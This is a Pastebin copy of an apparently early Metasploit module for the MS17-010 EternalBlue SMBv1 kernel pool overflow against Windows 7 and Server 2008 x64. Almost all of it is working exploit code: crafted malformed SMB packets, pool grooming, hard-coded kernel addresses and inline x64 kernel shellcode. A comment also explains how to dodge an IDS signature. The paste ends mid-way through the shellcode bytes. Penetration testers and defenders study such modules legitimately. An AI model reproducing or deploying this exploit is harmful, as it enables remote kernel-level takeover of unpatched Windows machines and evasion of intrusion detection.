API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 18th, 2017
47
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.43 KB | None | 0 0
raw download clone embed print report
  1. # This module is a work in progress, but should work for Windows 7 and Server 2008 x64.
  2.  
  3. ##
  4. # exploit/windows/smb/ms17_010_eternalblue
  5. #
  6. # This module is a standalone version, eventually the x64 ring 0 payload and
  7. # certain packets will be in separate files of the Metasploit master branch.
  8. ##
  9.  
  10. ##
  11. # This module requires Metasploit: http://metasploit.com/download
  12. # Current source: https://github.com/rapid7/metasploit-framework
  13. ##
  14.  
  15. require 'ruby_smb'
  16. require 'ruby_smb/smb1/packet'
  17.  
  18. class MetasploitModule < Msf::Exploit::Remote
  19. Rank = GreatRanking
  20.  
  21. include Msf::Exploit::Remote::Tcp
  22.  
  23. def initialize(info = {})
  24. super(update_info(info,
  25. 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
  26. 'Description' => %q{
  27. This module is a port of the Equation Group ETERNALBLUE exploit, part of
  28. the FuzzBunch toolkit released by Shadow Brokers.
  29.  
  30. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
  31. is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
  32. DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
  33. is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
  34. completed in srvnet!SrvNetWskReceiveComplete.
  35.  
  36. This exploit, like the original may not trigger 100% of the time, and should be
  37. run continuously until triggered. It seems like the pool will get hot streaks
  38. and need a cool down period before the shells rain in again.
  39. },
  40.  
  41. 'Author' => [
  42. 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
  43. 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
  44. 'Equation Group',
  45. 'Shadow Brokers'
  46. ],
  47. 'License' => MSF_LICENSE,
  48. 'References' =>
  49. [
  50. [ 'MSB', 'MS17-010' ],
  51. [ 'CVE', '2017-0143' ],
  52. [ 'CVE', '2017-0144' ],
  53. [ 'CVE', '2017-0145' ],
  54. [ 'CVE', '2017-0146' ],
  55. [ 'CVE', '2017-0147' ],
  56. [ 'CVE', '2017-0148' ],
  57. [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]
  58. ],
  59. 'DefaultOptions' =>
  60. {
  61. 'EXITFUNC' => 'thread',
  62. },
  63. 'Privileged' => true,
  64. 'Payload' =>
  65. {
  66. 'Space' => 2000, # this can be more, needs to be recalculated
  67. 'EncoderType' => Msf::Encoder::Type::Raw,
  68. },
  69. 'Platform' => 'win',
  70. 'Targets' =>
  71. [
  72. [ 'Windows 7 and Server 2008 (x64) All Service Packs',
  73. {
  74. 'Platform' => 'win',
  75. 'Arch' => [ ARCH_X64 ],
  76.  
  77. 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
  78. 'et_alertable' => 0x4c, # ETHREAD.Alertable offset
  79. 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
  80. 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
  81. }
  82. ],
  83. ],
  84. 'DefaultTarget' => 0,
  85. 'DisclosureDate' => 'Mar 14 2017'
  86. ))
  87.  
  88. register_options(
  89. [
  90. Opt::RPORT(445),
  91. OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),
  92. OptInt.new( 'MaxExploitAttempts', [ true, "The number of times to retry the exploit.", 3 ] ),
  93. OptInt.new( 'GroomAllocations', [ true, "Initial number of times to groom the kernel pool.", 12 ] ),
  94. OptInt.new( 'GroomDelta', [ true, "The amount to increase the groom count by per try.", 5 ] )
  95. ])
  96. end
  97.  
  98. def check
  99. # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
  100. end
  101.  
  102. def exploit
  103. begin
  104. for i in 1..datastore['MaxExploitAttempts']
  105.  
  106. grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
  107.  
  108. smb_eternalblue(datastore['ProcessName'], grooms)
  109.  
  110. # we don't need this sleep, and need to find a way to remove it
  111. # problem is session_count won't increment until stage is complete :\
  112. secs = 0
  113. while !session_created? and secs < 5
  114. secs += 1
  115. sleep 1
  116. end
  117.  
  118. if session_created?
  119. print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
  120. print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
  121. print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
  122. break
  123. else
  124. print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
  125. print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
  126. print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
  127. end
  128. end
  129.  
  130. rescue ::RubySMB::Error::UnexpectedStatusCode,
  131. ::Errno::ECONNRESET,
  132. ::Rex::HostUnreachable,
  133. ::Rex::ConnectionTimeout,
  134. ::Rex::ConnectionRefused => e
  135. print_bad("#{e.class}: #{e.message}")
  136. rescue => error
  137. print_bad(error.class)
  138. print_bad(error.message)
  139. print_bad(error.backtrace)
  140. ensure
  141. # pass
  142. end
  143. end
  144.  
  145. #
  146. # Increase the default delay by five seconds since some kernel-mode
  147. # payloads may not run immediately.
  148. #
  149. def wfs_delay
  150. super + 5
  151. end
  152.  
  153. def smb_eternalblue(process_name, grooms)
  154. begin
  155. # Step 0: pre-calculate what we can
  156. shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)
  157. payload_hdr_pkt = make_smb2_payload_headers_packet
  158. payload_body_pkt = make_smb2_payload_body_packet(shellcode)
  159.  
  160. # Step 1: Connect to IPC$ share
  161. print_status("Connecting to target for exploitation.")
  162. client, tree, sock = smb1_anonymous_connect_ipc()
  163. print_good("Connection established for exploitation.")
  164.  
  165. print_status("Trying exploit with #{grooms} Groom Allocations.")
  166.  
  167. # Step 2: Create a large SMB1 buffer
  168. print_status("Sending all but last fragment of exploit packet")
  169. smb1_large_buffer(client, tree, sock)
  170.  
  171. # Step 3: Groom the pool with payload packets, and open/close SMB1 packets
  172. print_status("Starting non-paged pool grooming")
  173.  
  174. # initialize_groom_threads(ip, port, payload, grooms)
  175. fhs_sock = smb1_free_hole(true)
  176.  
  177. @groom_socks = []
  178.  
  179. print_good("Sending SMBv2 buffers")
  180. smb2_grooms(grooms, payload_hdr_pkt)
  181.  
  182. fhf_sock = smb1_free_hole(false)
  183.  
  184. print_good("Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.")
  185. fhs_sock.shutdown()
  186.  
  187. print_status("Sending final SMBv2 buffers.") # 6x
  188. smb2_grooms(6, payload_hdr_pkt) # todo: magic #
  189.  
  190. fhf_sock.shutdown()
  191.  
  192. print_status("Sending last fragment of exploit packet!")
  193. final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)
  194. sock.put(final_exploit_pkt)
  195.  
  196. print_status("Receiving response from exploit packet")
  197. code, raw = smb1_get_response(sock)
  198.  
  199. if code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D)
  200. print_good("ETERNALBLUE overwrite completed successfully (0xC000000D)!")
  201. end
  202.  
  203. # Step 4: Send the payload
  204. print_status("Sending egg to corrupted connection.")
  205.  
  206. @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }
  207. @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }
  208.  
  209. print_status("Triggering free of corrupted buffer.")
  210. # tree disconnect
  211. # logoff and x
  212. # note: these aren't necessary, just close the sockets
  213.  
  214. ensure
  215. abort_sockets
  216. end
  217. end
  218.  
  219. def smb2_grooms(grooms, payload_hdr_pkt)
  220. grooms.times do |groom_id|
  221. gsock = connect(false)
  222. @groom_socks << gsock
  223. gsock.put(payload_hdr_pkt)
  224. end
  225. end
  226.  
  227. def smb1_anonymous_connect_ipc()
  228. sock = connect(false)
  229. dispatcher = RubySMB::Dispatcher::Socket.new(sock)
  230. client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
  231. client.negotiate
  232.  
  233. pkt = make_smb1_anonymous_login_packet
  234. sock.put(pkt)
  235.  
  236. code, raw, response = smb1_get_response(sock)
  237.  
  238. unless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS
  239. raise RubySMB::Error::UnexpectedStatusCode, "Error with anonymous login"
  240. end
  241.  
  242. client.user_id = response.uid
  243.  
  244. tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
  245.  
  246. return client, tree, sock
  247. end
  248.  
  249. def smb1_large_buffer(client, tree, sock)
  250. nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)
  251.  
  252. # send NT Trans
  253. vprint_status("Sending NT Trans Request packet")
  254. sock.put(nt_trans_pkt)
  255.  
  256. vprint_status("Receiving NT Trans packet")
  257. raw = sock.get_once
  258.  
  259. # Initial Trans2 request
  260. trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)
  261.  
  262. # send all but last packet
  263. for i in 1..14
  264. trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)
  265. end
  266.  
  267. trans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id)
  268.  
  269. vprint_status("Sending malformed Trans2 packets")
  270. sock.put(trans2_pkt_nulled)
  271.  
  272. sock.get_once
  273. end
  274.  
  275. def smb1_free_hole(start)
  276. sock = connect(false)
  277. dispatcher = RubySMB::Dispatcher::Socket.new(sock)
  278. client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
  279. client.negotiate
  280.  
  281. pkt = ""
  282.  
  283. if start
  284. vprint_status("Sending start free hole packet.")
  285. pkt = make_smb1_free_hole_session_packet("\x07\xc0", "\x2d\x01", "\xf0\xff\x00\x00\x00")
  286. else
  287. vprint_status("Sending end free hole packet.")
  288. pkt = make_smb1_free_hole_session_packet("\x07\x40", "\x2c\x01", "\xf8\x87\x00\x00\x00")
  289. end
  290.  
  291. #dump_packet(pkt)
  292. sock.put(pkt)
  293.  
  294. vprint_status("Receiving free hole response.")
  295. sock.get_once
  296.  
  297. return sock
  298. end
  299.  
  300. def smb1_get_response(sock)
  301. raw = sock.get_once
  302. response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])
  303. code = response.nt_status
  304. return code, raw, response
  305. end
  306.  
  307. def make_smb2_payload_headers_packet
  308. # don't need a library here, the packet is essentially nonsensical
  309. pkt = ""
  310. pkt << "\x00" # session message
  311. pkt << "\x00\xff\xf7" # size
  312. pkt << "\xfeSMB" # SMB2
  313. pkt << "\x00" * 124
  314.  
  315. pkt
  316. end
  317.  
  318. def make_smb2_payload_body_packet(kernel_user_payload)
  319. # precalculated lengths
  320. pkt_max_len = 4204
  321. pkt_setup_len = 497
  322. pkt_max_payload = pkt_max_len - pkt_setup_len # 3575
  323.  
  324. # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode
  325. pkt = ""
  326.  
  327. # padding
  328. pkt << "\x00" * 0x8
  329. pkt << "\x03\x00\x00\x00"
  330. pkt << "\x00" * 0x1c
  331. pkt << "\x03\x00\x00\x00"
  332. pkt << "\x00" * 0x74
  333.  
  334. # KI_USER_SHARED_DATA addresses
  335. pkt << "\xb0\x00\xd0\xff\xff\xff\xff\xff" * 2 # x64 address
  336. pkt << "\x00" * 0x10
  337. pkt << "\xc0\xf0\xdf\xff" * 2 # x86 address
  338. pkt << "\x00" * 0xc4
  339.  
  340. # payload addreses
  341. pkt << "\x90\xf1\xdf\xff"
  342. pkt << "\x00" * 0x4
  343. pkt << "\xf0\xf1\xdf\xff"
  344. pkt << "\x00" * 0x40
  345.  
  346. pkt << "\xf0\x01\xd0\xff\xff\xff\xff\xff"
  347. pkt << "\x00" * 0x8
  348. pkt << "\x00\x02\xd0\xff\xff\xff\xff\xff"
  349. pkt << "\x00"
  350.  
  351. pkt << kernel_user_payload
  352.  
  353. # fill out the rest, this can be randomly generated
  354. pkt << "\x00" * (pkt_max_payload - kernel_user_payload.length)
  355.  
  356. pkt
  357. end
  358.  
  359. def make_smb1_echo_packet(tree_id, user_id)
  360. pkt = ""
  361. pkt << "\x00" # type
  362. pkt << "\x00\x00\x31" # len = 49
  363. pkt << "\xffSMB" # SMB1
  364. pkt << "\x2b" # Echo
  365. pkt << "\x00\x00\x00\x00" # Success
  366. pkt << "\x18" # flags
  367. pkt << "\x07\xc0" # flags2
  368. pkt << "\x00\x00" # PID High
  369. pkt << "\x00\x00\x00\x00" # Signature1
  370. pkt << "\x00\x00\x00\x00" # Signature2
  371. pkt << "\x00\x00" # Reserved
  372. pkt << [tree_id].pack("S>") # Tree ID
  373. pkt << "\xff\xfe" # PID
  374. pkt << [user_id].pack("S>") # UserID
  375. pkt << "\x40\x00" # MultiplexIDs
  376.  
  377. pkt << "\x01" # Word count
  378. pkt << "\x01\x00" # Echo count
  379. pkt << "\x0c\x00" # Byte count
  380.  
  381. # echo data
  382. # this is an existing IDS signature, and can be nulled out
  383. #pkt << "\x4a\x6c\x4a\x6d\x49\x68\x43\x6c\x42\x73\x72\x00"
  384. pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00"
  385.  
  386. pkt
  387. end
  388.  
  389. # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit
  390. def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)
  391. timeout = (timeout * 0x10) + 3
  392.  
  393. pkt = ""
  394. pkt << "\x00" # Session message
  395. pkt << "\x00\x10\x35" # length
  396. pkt << "\xffSMB" # SMB1
  397. pkt << "\x33" # Trans2 request
  398. pkt << "\x00\x00\x00\x00" # NT SUCCESS
  399. pkt << "\x18" # Flags
  400. pkt << "\x07\xc0" # Flags2
  401. pkt << "\x00\x00" # PID High
  402. pkt << "\x00\x00\x00\x00" # Signature1
  403. pkt << "\x00\x00\x00\x00" # Signature2
  404. pkt << "\x00\x00" # Reserved
  405. pkt << [tree_id].pack("S>") # TreeID
  406. pkt << "\xff\xfe" # PID
  407. pkt << [user_id].pack("S>") # UserID
  408. pkt << "\x40\x00" # MultiplexIDs
  409.  
  410. pkt << "\x09" # Word Count
  411. pkt << "\x00\x00" # Total Param Count
  412. pkt << "\x00\x10" # Total Data Count
  413. pkt << "\x00\x00" # Max Param Count
  414. pkt << "\x00\x00" # Max Data Count
  415. pkt << "\x00" # Max Setup Count
  416. pkt << "\x00" # Reserved
  417. pkt << "\x00\x10" # Flags
  418. pkt << "\x35\x00\xd0" # Timeouts
  419. pkt << timeout.chr
  420. pkt << "\x00\x00" # Reserved
  421. pkt << "\x00\x10" # Parameter Count
  422.  
  423. #pkt << "\x74\x70" # Parameter Offset
  424. #pkt << "\x47\x46" # Data Count
  425. #pkt << "\x45\x6f" # Data Offset
  426. #pkt << "\x4c" # Setup Count
  427. #pkt << "\x4f" # Reserved
  428.  
  429. if type == :eb_trans2_exploit
  430. vprint_status("Making :eb_trans2_exploit packet")
  431.  
  432. pkt << "\x41" * 2957
  433.  
  434. pkt << "\x80\x00\xa8\x00" # overflow
  435.  
  436. pkt << "\x00" * 0x10
  437. pkt << "\xff\xff"
  438. pkt << "\x00" * 0x6
  439. pkt << "\xff\xff"
  440. pkt << "\x00" * 0x16
  441.  
  442. pkt << "\x00\xf1\xdf\xff" # x86 addresses
  443. pkt << "\x00" * 0x8
  444. pkt << "\x20\xf0\xdf\xff"
  445.  
  446. pkt << "\x00\xf1\xdf\xff\xff\xff\xff\xff" # x64
  447.  
  448. pkt << "\x60\x00\x04\x10"
  449. pkt << "\x00" * 4
  450.  
  451. pkt << "\x80\xef\xdf\xff"
  452.  
  453. pkt << "\x00" * 4
  454. pkt << "\x10\x00\xd0\xff\xff\xff\xff\xff"
  455. pkt << "\x18\x01\xd0\xff\xff\xff\xff\xff"
  456. pkt << "\x00" * 0x10
  457.  
  458. pkt << "\x60\x00\x04\x10"
  459. pkt << "\x00" * 0xc
  460. pkt << "\x90\xff\xcf\xff\xff\xff\xff\xff"
  461. pkt << "\x00" * 0x8
  462. pkt << "\x80\x10"
  463. pkt << "\x00" * 0xe
  464. pkt << "\x39"
  465. pkt << "\xbb"
  466.  
  467. pkt << "\x41" * 965
  468.  
  469. return pkt
  470. end
  471.  
  472. if type == :eb_trans2_zero
  473. vprint_status("Making :eb_trans2_zero packet")
  474. pkt << "\x00" * 2055
  475. pkt << "\x83\xf3"
  476. pkt << "\x41" * 2039
  477. #pkt << "\x00" * 4096
  478. else
  479. vprint_status("Making :eb_trans2_buffer packet")
  480. pkt << "\x41" * 4096
  481. end
  482.  
  483. pkt
  484.  
  485. end
  486.  
  487. def make_smb1_nt_trans_packet(tree_id, user_id)
  488. pkt = ""
  489. pkt << "\x00" # Session message
  490. pkt << "\x00\x04\x38" # length
  491. pkt << "\xffSMB" # SMB1
  492. pkt << "\xa0" # NT Trans
  493. pkt << "\x00\x00\x00\x00" # NT SUCCESS
  494. pkt << "\x18" # Flags
  495. pkt << "\x07\xc0" # Flags2
  496. pkt << "\x00\x00" # PID High
  497. pkt << "\x00\x00\x00\x00" # Signature1
  498. pkt << "\x00\x00\x00\x00" # Signature2
  499. pkt << "\x00\x00" # Reserved
  500. pkt << [tree_id].pack("S>") # TreeID
  501. pkt << "\xff\xfe" # PID
  502. pkt << [user_id].pack("S>") # UserID
  503. pkt << "\x40\x00" # MultiplexID
  504.  
  505. pkt << "\x14" # Word Count
  506. pkt << "\x01" # Max Setup Count
  507. pkt << "\x00\x00" # Reserved
  508. pkt << "\x1e\x00\x00\x00" # Total Param Count
  509. pkt << "\xd0\x03\x01\x00" # Total Data Count
  510. pkt << "\x1e\x00\x00\x00" # Max Param Count
  511. pkt << "\x00\x00\x00\x00" # Max Data Count
  512. pkt << "\x1e\x00\x00\x00" # Param Count
  513. pkt << "\x4b\x00\x00\x00" # Param Offset
  514. pkt << "\xd0\x03\x00\x00" # Data Count
  515. pkt << "\x68\x00\x00\x00" # Data Offset
  516. pkt << "\x01" # Setup Count
  517. pkt << "\x00\x00" # Function <unknown>
  518. pkt << "\x00\x00" # Unknown NT transaction (0) setup
  519. pkt << "\xec\x03" # Byte Count
  520. pkt << "\x00" * 0x1f # NT Parameters
  521.  
  522. # undocumented
  523. pkt << "\x01"
  524. pkt << "\x00" * 0x3cd
  525.  
  526. pkt
  527. end
  528.  
  529. def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)
  530. pkt = ""
  531. pkt << "\x00" # Session message
  532. pkt << "\x00\x00\x51" # length
  533. pkt << "\xffSMB" # SMB1
  534. pkt << "\x73" # Session Setup AndX
  535. pkt << "\x00\x00\x00\x00" # NT SUCCESS
  536. pkt << "\x18" # Flags
  537. pkt << flags2 # Flags2
  538. pkt << "\x00\x00" # PID High
  539. pkt << "\x00\x00\x00\x00" # Signature1
  540. pkt << "\x00\x00\x00\x00" # Signature2
  541. pkt << "\x00\x00" # Reserved
  542. pkt << "\x00\x00" # TreeID
  543. pkt << "\xff\xfe" # PID
  544. pkt << "\x00\x00" # UserID
  545. pkt << "\x40\x00" # MultiplexID
  546. #pkt << "\x00\x00" # Reserved
  547.  
  548. pkt << "\x0c" # Word Count
  549. pkt << "\xff" # No further commands
  550. pkt << "\x00" # Reserved
  551. pkt << "\x00\x00" # AndXOffset
  552. pkt << "\x04\x11" # Max Buffer
  553. pkt << "\x0a\x00" # Max Mpx Count
  554. pkt << vcnum # VC Number
  555. pkt << "\x00\x00\x00\x00" # Session key
  556. pkt << "\x00\x00" # Security blob length
  557. pkt << "\x00\x00\x00\x00" # Reserved
  558. pkt << "\x00\x00\x00\x80" # Capabilities
  559. pkt << "\x16\x00" # Byte count
  560. #pkt << "\xf0" # Security Blob: <MISSING>
  561. #pkt << "\xff\x00\x00\x00" # Native OS
  562. #pkt << "\x00\x00" # Native LAN manager
  563. #pkt << "\x00\x00" # Primary domain
  564. pkt << native_os
  565. pkt << "\x00" * 17 # Extra byte params
  566.  
  567. pkt
  568. end
  569.  
  570. def make_smb1_anonymous_login_packet
  571. # Neither Rex nor RubySMB appear to support Anon login?
  572. pkt = ""
  573. pkt << "\x00" # Session message
  574. pkt << "\x00\x00\x88" # length
  575. pkt << "\xffSMB" # SMB1
  576. pkt << "\x73" # Session Setup AndX
  577. pkt << "\x00\x00\x00\x00" # NT SUCCESS
  578. pkt << "\x18" # Flags
  579. pkt << "\x07\xc0" # Flags2
  580. pkt << "\x00\x00" # PID High
  581. pkt << "\x00\x00\x00\x00" # Signature1
  582. pkt << "\x00\x00\x00\x00" # Signature2
  583. pkt << "\x00\x00" # TreeID
  584. pkt << "\xff\xfe" # PID
  585. pkt << "\x00\x00" # Reserved
  586. pkt << "\x00\x00" # UserID
  587. pkt << "\x40\x00" # MultiplexID
  588.  
  589. pkt << "\x0d" # Word Count
  590. pkt << "\xff" # No further commands
  591. pkt << "\x00" # Reserved
  592. pkt << "\x88\x00" # AndXOffset
  593. pkt << "\x04\x11" # Max Buffer
  594. pkt << "\x0a\x00" # Max Mpx Count
  595. pkt << "\x00\x00" # VC Number
  596. pkt << "\x00\x00\x00\x00" # Session key
  597. pkt << "\x01\x00" # ANSI pw length
  598. pkt << "\x00\x00" # Unicode pw length
  599. pkt << "\x00\x00\x00\x00" # Reserved
  600. pkt << "\xd4\x00\x00\x00" # Capabilities
  601. pkt << "\x4b\x00" # Byte count
  602. pkt << "\x00" # ANSI pw
  603. pkt << "\x00\x00" # Account name
  604. pkt << "\x00\x00" # Domain name
  605.  
  606. # Windows 2000 2195
  607. pkt << "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
  608. pkt << "\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00"
  609. pkt << "\x00\x00"
  610.  
  611. # Windows 2000 5.0
  612. pkt << "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
  613. pkt << "\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"
  614.  
  615. pkt
  616. end
  617.  
  618. # ring3 = user mode encoded payload
  619. # proc_name = process to inject APC into
  620. # ep_thl_b = EPROCESS.ThreadListHead.Blink offset
  621. # et_alertable = ETHREAD.Alertable offset
  622. # teb_acp = TEB.ActivationContextPointer offset
  623. # et_tle = ETHREAD.ThreadListEntry offset
  624. def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)
  625. sc = make_kernel_shellcode
  626. sc << [ring3.length].pack("S<")
  627. sc << ring3
  628. sc
  629. end
  630.  
  631. def make_kernel_shellcode
  632. # https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm
  633. # Name: kernel
  634. # Length: 1019 bytes
  635.  
  636. #"\xcc"+
  637. "\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8\x0F\xD0\xFF\xFF\xFF\xFF" +
  638. "\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A\x00\x00\x00\x48\x89\xC2" +
  639. "\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8\x65\x48\x89\x24\x25\x10" +
  640. "\x00\x00\x00\x65\x48\x8B\x24\x25\xA8\x01\x00\x00\x50\x53\x51\x52" +
  641. "\x56\x57\x55\x41\x50\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41" +
  642. "\x56\x41\x57\x6A\x2B\x65\xFF\x34\x25\x10\x00\x00\x00\x41\x53\x6A" +
  643. "\x33\x51\x4C\x89\xD1\x48\x83\xEC\x08\x55\x48\x81\xEC\x58\x01\x00" +
  644. "\x00\x48\x8D\xAC\x24\x80\x00\x00\x00\x48\x89\x9D\xC0\x00\x00\x00" +
  645. "\x48\x89\xBD\xC8\x00\x00\x00\x48\x89\xB5\xD0\x00\x00\x00\x48\xA1" +
  646. "\xF8\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x48\x89\xC2\x48\xC1\xEA\x20\x48" +
  647. "\x31\xDB\xFF\xCB\x48\x21\xD8\xB9\x82\x00\x00\xC0\x0F\x30\xFB\xE8" +
  648. "\x38\x00\x00\x00\xFA\x65\x48\x8B\x24\x25\xA8\x01\x00\x00\x48\x83" +
  649. "\xEC\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x41\x5B\x41\x5A\x41\x59" +
  650. "\x41\x58\x5D\x5F\x5E\x5A\x59\x5B\x58\x65\x48\x8B\x24\x25\x10\x00" +
  651. "\x00\x00\x0F\x01\xF8\xFF\x24\x25\xF8\x0F\xD0\xFF\x56\x41\x57\x41" +
  652. "\x56\x41\x55\x41\x54\x53\x55\x48\x89\xE5\x66\x83\xE4\xF0\x48\x83" +
  653. "\xEC\x20\x4C\x8D\x35\xE3\xFF\xFF\xFF\x65\x4C\x8B\x3C\x25\x38\x00" +
  654. "\x00\x00\x4D\x8B\x7F\x04\x49\xC1\xEF\x0C\x49\xC1\xE7\x0C\x49\x81" +
  655. "\xEF\x00\x10\x00\x00\x49\x8B\x37\x66\x81\xFE\x4D\x5A\x75\xEF\x41" +
  656. "\xBB\x5C\x72\x11\x62\xE8\x18\x02\x00\x00\x48\x89\xC6\x48\x81\xC6" +
  657. "\x08\x03\x00\x00\x41\xBB\x7A\xBA\xA3\x30\xE8\x03\x02\x00\x00\x48" +
  658. "\x89\xF1\x48\x39\xF0\x77\x11\x48\x8D\x90\x00\x05\x00\x00\x48\x39" +
  659. "\xF2\x72\x05\x48\x29\xC6\xEB\x08\x48\x8B\x36\x48\x39\xCE\x75\xE2" +
  660. "\x49\x89\xF4\x31\xDB\x89\xD9\x83\xC1\x04\x81\xF9\x00\x00\x01\x00" +
  661. "\x0F\x8D\x66\x01\x00\x00\x4C\x89\xF2\x89\xCB\x41\xBB\x66\x55\xA2" +
  662. "\x4B\xE8\xBC\x01\x00\x00\x85\xC0\x75\xDB\x49\x8B\x0E\x41\xBB\xA3" +
  663. "\x6F\x72\x2D\xE8\xAA\x01\x00\x00\x48\x89\xC6\xE8\x50\x01\x00\x00" +
  664. "\x41\x81\xF9\xBF\x77\x1F\xDD\x75\xBC\x49\x8B\x1E\x4D\x8D\x6E\x10" +
  665. "\x4C\x89\xEA\x48\x89\xD9\x41\xBB\xE5\x24\x11\xDC\xE8\x81\x01\x00" +
  666. "\x00\x6A\x40\x68\x00\x10\x00\x00\x4D\x8D\x4E\x08\x49\xC7\x01\x00" +
  667. "\x10\x00\x00\x4D\x31\xC0\x4C\x89\xF2\x31\xC9\x48\x89\x0A\x48\xF7" +
  668. "\xD1\x41\xBB\x4B\xCA\x0A\xEE\x48\x83\xEC\x20\xE8\x52\x01\x00\x00" +
  669. "\x85\xC0\x0F\x85\xC8\x00\x00\x00\x49\x8B\x3E\x48\x8D\x35\xE9\x00" +
  670. "\x00\x00\x31\xC9\x66\x03\x0D\xD7\x01\x00\x00\x66\x81\xC1\xF9\x00" +
  671. "\xF3\xA4\x48\x89\xDE\x48\x81\xC6\x08\x03\x00\x00\x48\x89\xF1\x48" +
  672. "\x8B\x11\x4C\x29\xE2\x51\x52\x48\x89\xD1\x48\x83\xEC\x20\x41\xBB" +
  673. "\x26\x40\x36\x9D\xE8\x09\x01\x00\x00\x48\x83\xC4\x20\x5A\x59\x48" +
  674. "\x85\xC0\x74\x18\x48\x8B\x80\xC8\x02\x00\x00\x48\x85\xC0\x74\x0C" +
  675. "\x48\x83\xC2\x4C\x8B\x02\x0F\xBA\xE0\x05\x72\x05\x48\x8B\x09\xEB" +
  676. "\xBE\x48\x83\xEA\x4C\x49\x89\xD4\x31\xD2\x80\xC2\x90\x31\xC9\x41" +
  677. "\xBB\x26\xAC\x50\x91\xE8\xC8\x00\x00\x00\x48\x89\xC1\x4C\x8D\x89" +
  678. "\x80\x00\x00\x00\x41\xC6\x01\xC3\x4C\x89\xE2\x49\x89\xC4\x4D\x31" +
  679. "\xC0\x41\x50\x6A\x01\x49\x8B\x06\x50\x41\x50\x48\x83\xEC\x20\x41" +
  680. "\xBB\xAC\xCE\x55\x4B\xE8\x98\x00\x00\x00\x31\xD2\x52\x52\x41\x58" +
  681. "\x41\x59\x4C\x89\xE1\x41\xBB\x18\x38\x09\x9E\xE8\x82\x00\x00\x00" +
  682. "\x4C\x89\xE9\x41\xBB\x22\xB7\xB3\x7D\xE8\x74\x00\x00\x00\x48\x89" +
  683. "\xD9\x41\xBB\x0D\xE2\x4D\x85\xE8\x66\x00\x00\x00\x48\x89\xEC\x5D" +
  684. "\x5B\x41\x5C\x41\x5D\x41\x5E\x41\x5F\x5E\xC3\xE9\xB5\x00\x00\x00" +
  685. "\x4D\x31\xC9\x31\xC0\xAC\x41\xC1\xC9\x0D\x3C\x61\x7C\x02\x2C\x20" +
  686. "\x41\x01\xC1\x38\xE0\x75\xEC\xC3\x31\xD2\x65\x48\x8B\x52\x60\x48" +
  687. "\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x12\x48\x8B\x72\x50\x48\x0F" +
  688. "\xB7\x4A\x4A\x45\x31\xC9\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\x41" +
